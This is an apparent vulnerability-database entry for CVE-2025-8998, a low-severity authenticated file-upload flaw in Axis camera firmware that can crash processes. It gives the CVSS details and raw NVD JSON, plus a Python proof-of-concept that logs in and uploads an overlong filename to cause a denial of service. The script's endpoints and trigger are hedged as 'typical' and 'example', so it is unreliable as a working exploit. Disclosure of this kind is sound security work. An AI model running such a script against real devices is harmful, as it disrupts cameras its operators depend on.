Security Vulnerability Report
中文
CVE-2025-8998 CVSS 3.1 LOW

CVE-2025-8998

Published: 2025-11-11 08:15:35
Last Modified: 2026-04-15 00:35:42

Description

It was possible to upload files with a specific name to a temporary directory, which may result in process crashes and impact usability. This flaw can only be exploited after authenticating with an operator- or administrator-privileged service account.

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Axis网络摄像头和视频设备(固件版本 < 修复版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-8998 PoC - File Upload leading to DoS # Requires valid operator/administrator credentials import requests import sys TARGET = "http://target-device.local" USERNAME = "operator" PASSWORD = "password" def exploit(): """Upload file with specific name to trigger crash""" session = requests.Session() # Authentication login_url = f"{TARGET}/axis-cgi/pwdgrp.cgi" auth_data = { "user": USERNAME, "password": PASSWORD } session.post(login_url, data=auth_data) # Craft malicious filename to trigger vulnerability # The specific filename pattern triggers the DoS condition malicious_filename = "a" * 500 + ".tmp" # Example trigger pattern # File upload endpoint (typical Axis upload endpoint) upload_url = f"{TARGET}/axis-cgi/upload.cgi" files = { "file": (malicious_filename, b"A" * 1000, "application/octet-stream") } try: response = session.post(upload_url, files=files, timeout=10) print(f"Upload response: {response.status_code}") print("Check if service is still responsive...") except requests.exceptions.RequestException as e: print(f"Request failed (service may be crashed): {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8998", "sourceIdentifier": "[email protected]", "published": "2025-11-11T08:15:34.890", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "It was possible to upload files with a specific name to a temporary directory, which may result in process crashes and impact usability. This flaw can only be exploited after authenticating with an operator- or administrator-privileged service account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://www.axis.com/dam/public/f5/62/80/cve-2025-8998pdf-en-US-504374.pdf", "source": "[email protected]"}]}}